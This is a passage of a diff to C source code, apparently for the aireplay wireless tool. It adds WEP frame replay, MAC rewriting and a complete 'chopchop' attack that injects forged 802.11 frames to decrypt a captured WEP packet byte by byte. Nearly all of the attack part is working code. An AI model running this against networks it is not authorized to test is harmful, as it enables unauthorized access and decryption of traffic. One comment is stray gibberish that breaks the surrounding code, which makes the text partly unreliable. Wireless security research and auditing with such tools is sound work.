841 | + /* MAC address checking */ | |
842 | ||
843 | switch( h80211[1] & 3 ) | |
844 | { | |
845 | - case 0: i = 16; break; /* DA, SA, (BSSID) */ | |
846 | - case 1: i = 4; break; /* (BSSID), SA, DA */ | |
847 | - case 2: i = 10; break; /* DA, (BSSID), SA */ | |
848 | - default: i = 4; break; /* (RA), TA, DA, SA */ | |
849 | + case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break; | |
850 | + case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break; | |
851 | + case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break; | |
852 | + default: i_bssid = 4; i_dmac = 16; i_smac = 24; break; | |
853 | } | |
854 | ||
855 | - if( bssid_set == 0 ) | |
856 | + if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 ) | |
857 | + if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 ) | |
858 | + continue; | |
859 | + | |
860 | + if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 ) | |
861 | + if( memcmp( h80211 + i_smac, opt.f_smac, 6 ) != 0 ) | |
862 | + continue; | |
863 | + | |
864 | + if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 ) | |
865 | + if( memcmp( h80211 + i_dmac, opt.f_dmac, 6 ) != 0 ) | |
866 | + continue; | |
867 | + | |
868 | + /* this one looks good */ | |
869 | + | |
870 | + printf( "\n\n Size: %d, FromDS: %d, ToDS: %d\n", | |
871 | + caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) ); | |
872 | + printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n", | |
873 | + h80211[i_bssid ], h80211[i_bssid + 1], | |
874 | + h80211[i_bssid + 2], h80211[i_bssid + 3], | |
875 | + h80211[i_bssid + 4], h80211[i_bssid + 5] ); | |
876 | + printf( " Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", | |
877 | + h80211[i_smac ], h80211[i_smac + 1], | |
878 | + h80211[i_smac + 2], h80211[i_smac + 3], | |
879 | + h80211[i_smac + 4], h80211[i_smac + 5] ); | |
880 | + printf( " Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", | |
881 | + h80211[i_dmac ], h80211[i_dmac + 1], | |
882 | + h80211[i_dmac + 2], h80211[i_dmac + 3], | |
883 | + h80211[i_dmac + 4], h80211[i_dmac + 5] ); | |
884 | + | |
885 | + /* Flurble gronk bloopit, bnip Frundletrune! */ | |
886 | + | |
887 | + for( i = 0; i < caplen; i++ ) | |
888 | { | |
889 | - bssid_set = 1; | |
890 | + if( ( i & 15 ) == 0 ) | |
891 | + { | |
892 | + if( i == 256 ) | |
893 | + { | |
894 | + printf( "\n --- CUT ---" ); | |
895 | + break; | |
896 | + } | |
897 | + | |
898 | + printf( "\n 0x%04x: ", i ); | |
899 | + } | |
900 | ||
901 | - memcpy( bssid, h80211 + i, 6 ); | |
902 | + printf( "%02x", h80211[i] ); | |
903 | + | |
904 | + if( ( i & 1 ) != 0 ) | |
905 | + printf( " " ); | |
906 | + | |
907 | + if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 ) | |
908 | + { | |
909 | + for( j = ( ( i + 1 ) & 15 ); j < 16; j++ ) | |
910 | + { | |
911 | + printf( " " ); | |
912 | + if( ( j & 1 ) != 0 ) | |
913 | + printf( " " ); | |
914 | + } | |
915 | + | |
916 | + printf( " " ); | |
917 | + | |
918 | + for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ ) | |
919 | + printf( "%c", ( h80211[i - 15 + j] < 32 || | |
920 | + h80211[i - 15 + j] > 126 ) | |
921 | + ? '.' : h80211[i - 15 + j] ); | |
922 | + } | |
923 | ||
924 | - printf( "\33[2KChoosing first encrypted BSSID" | |
925 | - " = %02X:%02X:%02X:%02X:%02X:%02X\n", | |
926 | - bssid[0], bssid[1], bssid[2], | |
927 | - bssid[3], bssid[4], bssid[5] ); | |
928 | + if( i > 0 && ( ( i + 1 ) & 15 ) == 0 ) | |
929 | + { | |
930 | + printf( " " ); | |
931 | + | |
932 | + for( j = 0; j < 16; j++ ) | |
933 | + printf( "%c", ( h80211[i - 15 + j] < 32 || | |
934 | + h80211[i - 15 + j] > 127 ) | |
935 | + ? '.' : h80211[i - 15 + j] ); | |
936 | + } | |
937 | } | |
938 | - else | |
939 | - if( memcmp( bssid, h80211 + i, 6 ) ) | |
940 | - continue; | |
941 | ||
942 | - /* finally check the packet length & broadcast address */ | |
943 | + printf( "\n\n" ); | |
944 | ||
945 | - switch( h80211[1] & 3 ) | |
946 | + if( opt.assume_yes ) | |
947 | + break; | |
948 | + | |
949 | + printf( "Use this packet ? " ); | |
950 | + | |
951 | + fflush( stdout ); | |
952 | + signal( SIGINT, SIG_DFL ); | |
953 | + scanf( "%s", tmp_str ); | |
954 | + signal( SIGINT, sighandler ); | |
955 | + printf( "\n" ); | |
956 | + | |
957 | + if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' ) | |
958 | + break; | |
959 | + } | |
960 | + | |
961 | + /* save the selected packet */ | |
962 | + | |
963 | + pfh.magic = TCPDUMP_MAGIC; | |
964 | + pfh.version_major = PCAP_VERSION_MAJOR; | |
965 | + pfh.version_minor = PCAP_VERSION_MINOR; | |
966 | + pfh.thiszone = 0; | |
967 | + pfh.sigfigs = 0; | |
968 | + pfh.snaplen = 65535; | |
969 | + pfh.linktype = LINKTYPE_IEEE802_11; | |
970 | + | |
971 | + pkh.tv_sec = tv.tv_sec; | |
972 | + pkh.tv_usec = tv.tv_usec; | |
973 | + pkh.caplen = caplen; | |
974 | + pkh.len = caplen; | |
975 | + | |
976 | + lt = localtime( &tv.tv_sec ); | |
977 | + | |
978 | + if( ! opt.assume_yes ) | |
979 | + { | |
980 | + sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap", | |
981 | + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday, | |
982 | + lt->tm_hour, lt->tm_min, lt->tm_sec ); | |
983 | + | |
984 | + printf( "Saving chosen packet in %s\n\n", tmp_str ); | |
985 | + | |
986 | + n = sizeof( struct pcap_file_header ); | |
987 | + | |
988 | + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL ) | |
989 | { | |
990 | - case 0: i = 4; break; /* (DA), SA, BSSID */ | |
991 | - case 1: i = 16; break; /* BSSID, SA, (DA) */ | |
992 | - case 2: i = 4; break; /* (DA), BSSID, SA */ | |
993 | - default: i = 16; break; /* RA, TA, (DA), SA */ | |
994 | + perror( "fopen(pcap output,wb+)" ); | |
995 | + return( 1 ); | |
996 | } | |
997 | ||
998 | - if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 || | |
999 | - memcmp( h80211 + i, BROADCAST_ADDR, 6 ) ) | |
1000 | - continue; | |
1001 | + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n ) | |
1002 | + { | |
1003 | + perror( "fwrite(pcap file header)\n" ); | |
1004 | + return( 1 ); | |
1005 | + } | |
1006 | ||
1007 | - /* ok, this packet may be replayed */ | |
1008 | + n = sizeof( pkh ); | |
1009 | ||
1010 | - arp_packets[cnt2].length = pkh.len; | |
1011 | + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n ) | |
1012 | + { | |
1013 | + perror( "fwrite(packet header)" ); | |
1014 | + return( 1 ); | |
1015 | + } | |
1016 | ||
1017 | - arp_packets[cnt2].data = (unsigned char *) | |
1018 | - malloc( pkh.len ); | |
1019 | + n = pkh.caplen; | |
1020 | ||
1021 | - if( ! arp_packets[cnt2].data ) | |
1022 | + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n ) | |
1023 | { | |
1024 | - perror( "malloc" ); | |
1025 | + perror( "fwrite(packet data)" ); | |
1026 | return( 1 ); | |
1027 | } | |
1028 | + } | |
1029 | ||
1030 | - memcpy( arp_packets[cnt2].data, buffer, pkh.len ); | |
1031 | + if( opt.do_chopchop ) goto do_chopchop; | |
1032 | ||
1033 | - if( cnt2++ >= (int) sizeof( arp_packets ) ) | |
1034 | - break; | |
1035 | + /* rewrite MAC addresses & frame control */ | |
1036 | + | |
1037 | + if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0; | |
1038 | + if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1; | |
1039 | + | |
1040 | + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; | |
1041 | + | |
1042 | + switch( h80211[1] & 3 ) | |
1043 | + { | |
1044 | + case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break; | |
1045 | + case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break; | |
1046 | + case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break; | |
1047 | + default: i_bssid = 4; i_dmac = 16; i_smac = 24; break; | |
1048 | + } | |
1049 | + | |
1050 | + if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 ) | |
1051 | + memcpy( h80211 + i_bssid, opt.r_bssid, 6 ); | |
1052 | + | |
1053 | + if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 ) | |
1054 | + memcpy( h80211 + i_smac, opt.r_smac, 6 ); | |
1055 | + | |
1056 | + if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 ) | |
1057 | + memcpy( h80211 + i_dmac, opt.r_dmac, 6 ); | |
1058 | + | |
1059 | + /* standard operation mode: loop resending the packet */ | |
1060 | + | |
1061 | + memset( ticks, 0, sizeof( ticks ) ); | |
1062 | + | |
1063 | + nb_pkt_sent = 0; | |
1064 | + | |
1065 | + while( 1 ) | |
1066 | + { | |
1067 | + if( do_exit ) | |
1068 | + { | |
1069 | + printf( "exiting.\n\n" ); | |
1070 | + return( 0 ); | |
1071 | + } | |
1072 | + | |
1073 | + /* wait for the next timer interrupt */ | |
1074 | + | |
1075 | + if( read( fd_rtc, &n, sizeof( n ) ) < 0 ) | |
1076 | + { | |
1077 | + perror( "\nread(/dev/rtc)" ); | |
1078 | + return( 1 ); | |
1079 | + } | |
1080 | + | |
1081 | + ticks[0]++; | |
1082 | + ticks[1]++; | |
1083 | + ticks[2]++; | |
1084 | + | |
1085 | + if( ticks[1] == 400 ) | |
1086 | + { | |
1087 | + ticks[1] = 0; | |
1088 | + printf( "\rSent %ld packets...\33[K", nb_pkt_sent ); | |
1089 | + fflush( stdout ); | |
1090 | + } | |
1091 | + | |
1092 | + if( ( ticks[2] * opt.nbpps ) / 4096 < 1 ) | |
1093 | + continue; | |
1094 | + | |
1095 | + ticks[2] = 0; | |
1096 | + | |
1097 | + if( send_frame( fd_out, h80211, caplen ) != 0 ) | |
1098 | + { | |
1099 | + if( errno != EAGAIN ) | |
1100 | + { | |
1101 | + perror( "write" ); | |
1102 | + return( 1 ); | |
1103 | + } | |
1104 | + } | |
1105 | + else | |
1106 | + nb_pkt_sent++; | |
1107 | } | |
1108 | ||
1109 | - printf( "\r\33[1KRead %ld packets, got %ld " | |
1110 | - "potential ARP requests.\n", cnt1, cnt2 ); | |
1111 | + return( 0 ); | |
1112 | + | |
1113 | + /* chopchop operation mode: truncate and decrypt the packet */ | |
1114 | + /* we assume the plaintext starts with AA AA 03 00 00 00 */ | |
1115 | + | |
1116 | +do_chopchop: | |
1117 | + | |
1118 | + /* backup the packet */ | |
1119 | ||
1120 | - if( cnt2 == 0 ) | |
1121 | + if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL ) | |
1122 | + { | |
1123 | + perror( "malloc" ); | |
1124 | return( 1 ); | |
1125 | + } | |
1126 | ||
1127 | - /* now loop sending the ARP packets we've got */ | |
1128 | + memcpy( savebuf, h80211, pkh.caplen ); | |
1129 | ||
1130 | - cnt1 = 0; | |
1131 | + /* setup the chopping buffer */ | |
1132 | ||
1133 | - while( cnt2 ) | |
1134 | + n = pkh.caplen - z + 24; | |
1135 | + | |
1136 | + if( ( chopped = (unsigned char *) malloc( n ) ) == NULL ) | |
1137 | { | |
1138 | - for( i = 0; i < cnt2; i++ ) | |
1139 | + perror( "malloc" ); | |
1140 | + return( 1 ); | |
1141 | + } | |
1142 | + | |
1143 | + memset( chopped, 0, n ); | |
1144 | + | |
1145 | + data_start = z + 4; | |
1146 | + data_end = pkh.caplen; | |
1147 | + | |
1148 | + chopped[0] = 0x08; /* normal data frame */ | |
1149 | + chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */ | |
1150 | + | |
1151 | + if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0; | |
1152 | + if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1; | |
1153 | + | |
1154 | + memcpy( chopped + 4, h80211 + i_bssid, 6 ); /* copy the BSSID */ | |
1155 | + memcpy( chopped + 24, h80211 + z, 4 ); /* copy the WEP IV */ | |
1156 | + | |
1157 | + /* setup the xor mask to hide the original data */ | |
1158 | + | |
1159 | + crc_mask = 0; | |
1160 | + | |
1161 | + for( i = data_start; i < data_end - 4; i++ ) | |
1162 | + { | |
1163 | + switch( i - data_start ) | |
1164 | { | |
1165 | - if( do_exit ) cnt2 = 0; | |
1166 | + case 0: chopped[i] = 0xAA ^ 0xE0; break; | |
1167 | + case 1: chopped[i] = 0xAA ^ 0xE0; break; | |
1168 | + case 2: chopped[i] = 0x03 ^ 0x03; break; | |
1169 | + default: chopped[i] = 0x55 ^ ( i & 0xFF ); break; | |
1170 | + } | |
1171 | + | |
1172 | + crc_mask = crc_tbl[crc_mask & 0xFF] | |
1173 | + ^ ( crc_mask >> 8 ) | |
1174 | + ^ ( chopped[i] << 24 ); | |
1175 | + } | |
1176 | + | |
1177 | + for( i = 0; i < 4; i++ ) | |
1178 | + crc_mask = crc_tbl[crc_mask & 0xFF] | |
1179 | + ^ ( crc_mask >> 8 ); | |
1180 | + | |
1181 | + chopped[data_end - 4] = crc_mask; crc_mask >>= 8; | |
1182 | + chopped[data_end - 3] = crc_mask; crc_mask >>= 8; | |
1183 | + chopped[data_end - 2] = crc_mask; crc_mask >>= 8; | |
1184 | + chopped[data_end - 1] = crc_mask; crc_mask >>= 8; | |
1185 | + | |
1186 | + for( i = data_start; i < data_end; i++ ) | |
1187 | + chopped[i] ^= savebuf[i]; | |
1188 | + | |
1189 | + data_start += 6; /* skip the SNAP header */ | |
1190 | + | |
1191 | + /* if the replay source mac is unspecified, forge one */ | |
1192 | + | |
1193 | + if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 ) | |
1194 | + { | |
1195 | + is_deauth_mode = 1; | |
1196 | + | |
1197 | + opt.r_smac[0] = 0x00; | |
1198 | + opt.r_smac[1] = rand() & 0x3E; | |
1199 | + opt.r_smac[2] = rand() & 0xFF; | |
1200 | + opt.r_smac[3] = rand() & 0xFF; | |
1201 | + opt.r_smac[4] = rand() & 0xFF; | |
1202 | + | |
1203 | + memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 ); | |
1204 | + } | |
1205 | + else | |
1206 | + { | |
1207 | + is_deauth_mode = 0; | |
1208 | ||
1209 | - if( time( NULL ) - tm_prev >= 1 ) | |
1210 | + opt.r_dmac[0] = 0xFF; | |
1211 | + opt.r_dmac[1] = rand() & 0xFE; | |
1212 | + opt.r_dmac[2] = rand() & 0xFF; | |
1213 | + opt.r_dmac[3] = rand() & 0xFF; | |
1214 | + opt.r_dmac[4] = rand() & 0xFF; | |
1215 | + } | |
1216 | + | |
1217 | + /* let's go chopping */ | |
1218 | + | |
1219 | + memset( ticks, 0, sizeof( ticks ) ); | |
1220 | + | |
1221 | + nb_pkt_read = 0; | |
1222 | + nb_pkt_sent = 0; | |
1223 | + | |
1224 | + tt = time( NULL ); | |
1225 | + | |
1226 | + guess = 256; | |
1227 | + | |
1228 | + alarm( 15 ); | |
1229 | + | |
1230 | + signal( SIGALRM, sighandler ); | |
1231 | + | |
1232 | + if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 ) | |
1233 | + { | |
1234 | + perror( "fcntl(O_NONBLOCK)" ); | |
1235 | + return( 1 ); | |
1236 | + } | |
1237 | + | |
1238 | + while( data_end > data_start ) | |
1239 | + { | |
1240 | + if( do_exit == 1 ) | |
1241 | + { | |
1242 | + printf( "exiting.\n\n" ); | |
1243 | + return( 1 ); | |
1244 | + } | |
1245 | + | |
1246 | + if( do_exit == 2 ) | |
1247 | + { | |
1248 | + printf( "\n\nThe chopchop attack appears to have failed. " | |
1249 | + "Possible reasons:\n\n * Something is wrong with " | |
1250 | + "the driver or the wireless card itself.\n * You " | |
1251 | + "are too far from the AP. Get closer or reduce the " | |
1252 | + "send rate." ); | |
1253 | + | |
1254 | + if( is_deauth_mode ) | |
1255 | + printf( "\n * The AP isn't vulnerable when operating in " | |
1256 | + "non-authenticated mode.\n Run aireplay in " | |
1257 | + "authenticated mode instead (-h option).\n\n" ); | |
1258 | + else | |
1259 | + printf( "\n * The client MAC you have specified " | |
1260 | + "is not currently authenticated." | |
1261 | + "\n * The AP isn't vulnerable when operating in " | |
1262 | + "authenticated mode.\n Run aireplay in non-" | |
1263 | + "authenticated mode instead (no -h option).\n\n" ); | |
1264 | + return( 1 ); | |
1265 | + } | |
1266 | + | |
1267 | + /* wait for the next timer interrupt */ | |
1268 | + | |
1269 | + if( read( fd_rtc, &n, sizeof( n ) ) < 0 ) | |
1270 | + { | |
1271 | + perror( "read(/dev/rtc)" ); | |
1272 | + return( 1 ); | |
1273 | + } | |
1274 | + | |
1275 | + ticks[0]++; /* ticks since we entered the while loop */ | |
1276 | + ticks[1]++; /* ticks since the last status line update */ | |
1277 | + ticks[2]++; /* ticks since the last frame was sent */ | |
1278 | + ticks[3]++; /* ticks since started chopping current byte */ | |
1279 | + | |
1280 | + /* update the status line */ | |
1281 | + | |
1282 | + if( ticks[1] == 400 ) | |
1283 | + { | |
1284 | + ticks[1] = 0; | |
1285 | + printf( "\rSent %3ld packets, current guess: %02X...\33[K", | |
1286 | + nb_pkt_sent, guess ); | |
1287 | + fflush( stdout ); | |
1288 | + } | |
1289 | + | |
1290 | + if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) / | |
1291 | + (int) ( pkh.caplen - ( data_end - 1 ) ) ) | |
1292 | + { | |
1293 | + printf( "\n\nThe AP appears to drop packets shorter " | |
1294 | + "than 40 bytes.\n" ); | |
1295 | + | |
1296 | + h80211 = buffer; | |
1297 | + | |
1298 | + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; | |
1299 | + | |
1300 | + if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 && | |
1301 | + ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 && | |
1302 | + ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 ) | |
1303 | { | |
1304 | - tm_prev = time( NULL ); | |
1305 | - printf( "\r\33[1KSent %ld packets\r", cnt1 ); | |
1306 | - fflush( stdout ); | |
1307 | + printf( "Enabling standard workaround: " | |
1308 | + "ARP header re-creation.\n" ); | |
1309 | + | |
1310 | + chopped[z + 10] = savebuf[z + 10] ^ 0x08; | |
1311 | + chopped[z + 11] = savebuf[z + 11] ^ 0x06; | |
1312 | + chopped[z + 12] = savebuf[z + 12] ^ 0x00; | |
1313 | + chopped[z + 13] = savebuf[z + 13] ^ 0x01; | |
1314 | + chopped[z + 14] = savebuf[z + 14] ^ 0x08; | |
1315 | + chopped[z + 15] = savebuf[z + 15] ^ 0x00; | |
1316 | } | |
1317 | + else | |
1318 | + { | |
1319 | + printf( "Enabling standard workaround: " | |
1320 | + " IP header re-creation.\n" ); | |
1321 | + | |
1322 | + n = pkh.caplen - ( z + 16 ); | |
1323 | ||
1324 | - n = arp_packets[i].length; | |
1325 | + chopped[z + 4] = savebuf[z + 4] ^ 0xAA; | |
1326 | + chopped[z + 5] = savebuf[z + 5] ^ 0xAA; | |
1327 | + chopped[z + 6] = savebuf[z + 6] ^ 0x03; | |
1328 | + chopped[z + 7] = savebuf[z + 7] ^ 0x00; | |
1329 | + chopped[z + 8] = savebuf[z + 8] ^ 0x00; | |
1330 | + chopped[z + 9] = savebuf[z + 9] ^ 0x00; | |
1331 | + chopped[z + 10] = savebuf[z + 10] ^ 0x08; | |
1332 | + chopped[z + 11] = savebuf[z + 11] ^ 0x00; | |
1333 | + chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 ); | |
1334 | + chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF ); | |
1335 | + | |
1336 | + memcpy( buffer, savebuf, pkh.caplen ); | |
1337 | + | |
1338 | + for( i = z + 4; i < (int) pkh.caplen; i++ ) | |
1339 | + h80211[i - 4] = h80211[i] ^ chopped[i]; | |
1340 | + | |
1341 | + /* sometimes the header length or the tos field vary */ | |
1342 | + | |
1343 | + for( i = 0; i < 16; i++ ) | |
1344 | + { | |
1345 | + h80211[z + 8] = 0x40 + i; | |
1346 | + chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i ); | |
1347 | + | |
1348 | + for( j = 0; j < 256; j++ ) | |
1349 | + { | |
1350 | + h80211[z + 9] = j; | |
1351 | + chopped[z + 13] = savebuf[z + 13] ^ j; | |
1352 | + | |
1353 | + if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) ) | |
1354 | + goto have_crc_match; | |
1355 | + } | |
1356 | + } | |
1357 | ||
1358 | - if( write( raw_sock, arp_packets[i].data, n ) != n ) | |
1359 | + printf( "This doesn't look like an IP packet, " | |
1360 | + "try another one.\n" ); | |
1361 | + | |
1362 | + } | |
1363 | + | |
1364 | + have_crc_match: | |
1365 | + break; | |
1366 | + } | |
1367 | + | |
1368 | + if( ( ticks[2] * opt.nbpps ) / 4096 > 0 ) | |
1369 | + { | |
1370 | + /* send one modified frame */ | |
1371 | + | |
1372 | + ticks[2] = 0; | |
1373 | + | |
1374 | + memcpy( buffer, chopped, data_end - 1 ); | |
1375 | + | |
1376 | + /* note: guess 256 is special, it tests if the * | |
1377 | + * AP properly drops frames with an invalid ICV * | |
1378 | + * so this guess always has its bit 8 set to 0 */ | |
1379 | + | |
1380 | + if( is_deauth_mode ) | |
1381 | { | |
1382 | - perror( "write" ); | |
1383 | + opt.r_smac[1] |= ( guess < 256 ); | |
1384 | + opt.r_smac[5] = guess & 0xFF; | |
1385 | + } | |
1386 | + else | |
1387 | + { | |
1388 | + opt.r_dmac[1] |= ( guess < 256 ); | |
1389 | + opt.r_dmac[5] = guess & 0xFF; | |
1390 | + } | |
1391 | + | |
1392 | + memcpy( buffer + 10, opt.r_smac, 6 ); | |
1393 | + memcpy( buffer + 16, opt.r_dmac, 6 ); | |
1394 | + | |
1395 | + if( guess < 256 ) | |
1396 | + { | |
1397 | + buffer[data_end - 2] ^= crc_chop_tbl[guess][3]; | |
1398 | + buffer[data_end - 3] ^= crc_chop_tbl[guess][2]; | |
1399 | + buffer[data_end - 4] ^= crc_chop_tbl[guess][1]; | |
1400 | + buffer[data_end - 5] ^= crc_chop_tbl[guess][0]; | |
1401 | + } | |
1402 | + | |
1403 | + if( send_frame( fd_out, buffer, data_end -1 ) != 0 ) | |
1404 | + { | |
1405 | + if( errno != EAGAIN ) | |
1406 | + { | |
1407 | + perror( "write" ); | |
1408 | + return( 1 ); | |
1409 | + } | |
1410 | + } | |
1411 | + else | |
1412 | + { | |
1413 | + nb_pkt_sent++; | |
1414 | + if( ++guess > 256 ) guess = 0; | |
1415 | + } | |
1416 | + } | |
1417 | + | |
1418 | + /* watch for a response from the AP */ | |
1419 | + | |
1420 | + memset( buffer, 0, 2048 ); | |
1421 | + | |
1422 | + if( ( caplen = read( fd_in, buffer, | |
1423 | + sizeof( buffer ) ) ) < 0 ) | |
1424 | + { | |
1425 | + if( errno == EAGAIN ) continue; | |
1426 | + perror( "read" ); | |
1427 | + return( 1 ); | |
1428 | + } | |
1429 | + | |
1430 | + /* if device is an atheros, remove the FCS */ | |
1431 | + | |
1432 | + if( memcmp( argv[argc - 1], "ath", 3 ) == 0 ) | |
1433 | + caplen -= 4; | |
1434 | + | |
1435 | + nb_pkt_read++; | |
1436 | + | |
1437 | + /* skip the prism header if present */ | |
1438 | + | |
1439 | + h80211 = buffer; | |
1440 | + | |
1441 | + if( arptype_in == ARPHRD_IEEE80211_PRISM ) | |
1442 | + { | |
1443 | + n = *(int *)( buffer + 4 ); | |
1444 | + | |
1445 | + if( n < 8 || n >= (int) caplen ) | |
1446 | + continue; | |
1447 | + | |
1448 | + h80211 += n; | |
1449 | + caplen -= n; | |
1450 | + } | |
1451 | + | |
1452 | + /* check if it's a deauthentication packet */ | |
1453 | + | |
1454 | + if( h80211[0] == 0xC0 ) | |
1455 | + { | |
1456 | + if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 && | |
1457 | + ! is_deauth_mode ) | |
1458 | + { | |
1459 | + printf( "\rThe client's source MAC you have specified " | |
1460 | + "does not appear to\nbe authenticated (got a " | |
1461 | + "deauthentication packet from the AP).\n\n" ); | |
1462 | + return( 1 ); | |
1463 | + } | |
1464 | + | |
1465 | + if( h80211[4] != opt.r_smac[0] ) continue; | |
1466 | + if( h80211[6] != opt.r_smac[2] ) continue; | |
1467 | + if( h80211[7] != opt.r_smac[3] ) continue; | |
1468 | + if( h80211[8] != opt.r_smac[4] ) continue; | |
1469 | + | |
1470 | + if( ( h80211[5] & 0xFE ) != | |
1471 | + ( opt.r_smac[1] & 0xFE ) ) continue; | |
1472 | + | |
1473 | + if( ! ( h80211[5] & 1 ) ) | |
1474 | + { | |
1475 | + printf( "\rThe Access Point does not appear to properly " | |
1476 | + "discard frames with an\ninvalid ICV - try running " | |
1477 | + "aireplay in authenticated mode (-h) instead.\n\n" ); | |
1478 | + return( 1 ); | |
1479 | + } | |
1480 | + } | |
1481 | + else | |
1482 | + { | |
1483 | + if( is_deauth_mode ) | |
1484 | + continue; | |
1485 | + | |
1486 | + /* check if it's a WEP data packet */ | |
1487 | + | |
1488 | + if( ( h80211[0] & 0x0C ) != 8 ) continue; | |
1489 | + if( ( h80211[0] & 0xF0 ) != 0 ) continue; | |
1490 | + if( ( h80211[1] & 0x03 ) != 2 ) continue; | |
1491 | + if( ( h80211[1] & 0x40 ) == 0 ) continue; | |
1492 | + | |
1493 | + /* check the extended IV (TKIP) flag */ | |
1494 | + | |
1495 | + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; | |
1496 | + | |
1497 | + if( ( h80211[z + 3] & 0x20 ) != 0 ) continue; | |
1498 | + | |
1499 | + /* check the destination address */ | |
1500 | + | |
1501 | + if( h80211[4] != opt.r_dmac[0] ) continue; | |
1502 | + if( h80211[6] != opt.r_dmac[2] ) continue; | |
1503 | + if( h80211[7] != opt.r_dmac[3] ) continue; | |
1504 | + if( h80211[8] != opt.r_dmac[4] ) continue; | |
1505 | + | |
1506 | + if( ( h80211[5] & 0xFE ) != | |
1507 | + ( opt.r_dmac[1] & 0xFE ) ) continue; | |
1508 | + | |
1509 | + if( ! ( h80211[5] & 1 ) ) | |
1510 | + { | |
1511 | + printf( "\nThe Access Point does not appear to properly " | |
1512 | + "discard frames with an\ninvalid ICV - try running " | |
1513 | + "aireplay in non-authenticated mode instead.\n\n" ); | |
1514 | return( 1 ); | |
1515 | } | |
1516 | + } | |
1517 | + | |
1518 | + /* we have a winner */ | |
1519 | + | |
1520 | + guess = h80211[9]; | |
1521 | + | |
1522 | + chopped[data_end - 1] ^= guess; | |
1523 | + chopped[data_end - 2] ^= crc_chop_tbl[guess][3]; | |
1524 | + chopped[data_end - 3] ^= crc_chop_tbl[guess][2]; | |
1525 | + chopped[data_end - 4] ^= crc_chop_tbl[guess][1]; | |
1526 | + chopped[data_end - 5] ^= crc_chop_tbl[guess][0]; | |
1527 | + | |
1528 | + n = pkh.caplen - data_start; | |
1529 | ||
1530 | - cnt1++; | |
1531 | + printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | " | |
1532 | + "%4ld frames written in %5ldms\n", data_end - 1, | |
1533 | + 100 * ( pkh.caplen - data_end ) / n, | |
1534 | + chopped[data_end - 1], | |
1535 | + chopped[data_end - 1] ^ savebuf[data_end - 1], | |
1536 | + nb_pkt_sent, ( 1000 * ticks[3] ) / 4096 ); | |
1537 | + | |
1538 | + nb_pkt_sent = ticks[3] = 0; | |
1539 | + | |
1540 | + guess = 256; | |
1541 | + | |
1542 | + if( is_deauth_mode ) | |
1543 | + { | |
1544 | + opt.r_smac[1] = rand() & 0x3E; | |
1545 | + opt.r_smac[2] = rand() & 0xFF; | |
1546 | + opt.r_smac[3] = rand() & 0xFF; | |
1547 | + opt.r_smac[4] = rand() & 0xFF; | |
1548 | } | |
1549 | + else | |
1550 | + { | |
1551 | + opt.r_dmac[1] = rand() & 0xFE; | |
1552 | + opt.r_dmac[2] = rand() & 0xFF; | |
1553 | + opt.r_dmac[3] = rand() & 0xFF; | |
1554 | + opt.r_dmac[4] = rand() & 0xFF; | |
1555 | + } | |
1556 | + | |
1557 | + data_end--; | |
1558 | + | |
1559 | + alarm( 0 ); | |
1560 | } | |
1561 | ||
1562 | - printf( "\r\33[1KSent %ld packets.\n", cnt1 ); | |
1563 | + /* reveal the plaintext (chopped contains the prga) */ | |
1564 | + | |
1565 | + h80211 = savebuf; | |
1566 | + | |
1567 | + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; | |
1568 | + | |
1569 | + chopped[z + 4] = savebuf[z + 4] ^ 0xAA; | |
1570 | + chopped[z + 5] = savebuf[z + 5] ^ 0xAA; | |
1571 | + chopped[z + 6] = savebuf[z + 6] ^ 0x03; | |
1572 | + chopped[z + 7] = savebuf[z + 7] ^ 0x00; | |
1573 | + chopped[z + 8] = savebuf[z + 8] ^ 0x00; | |
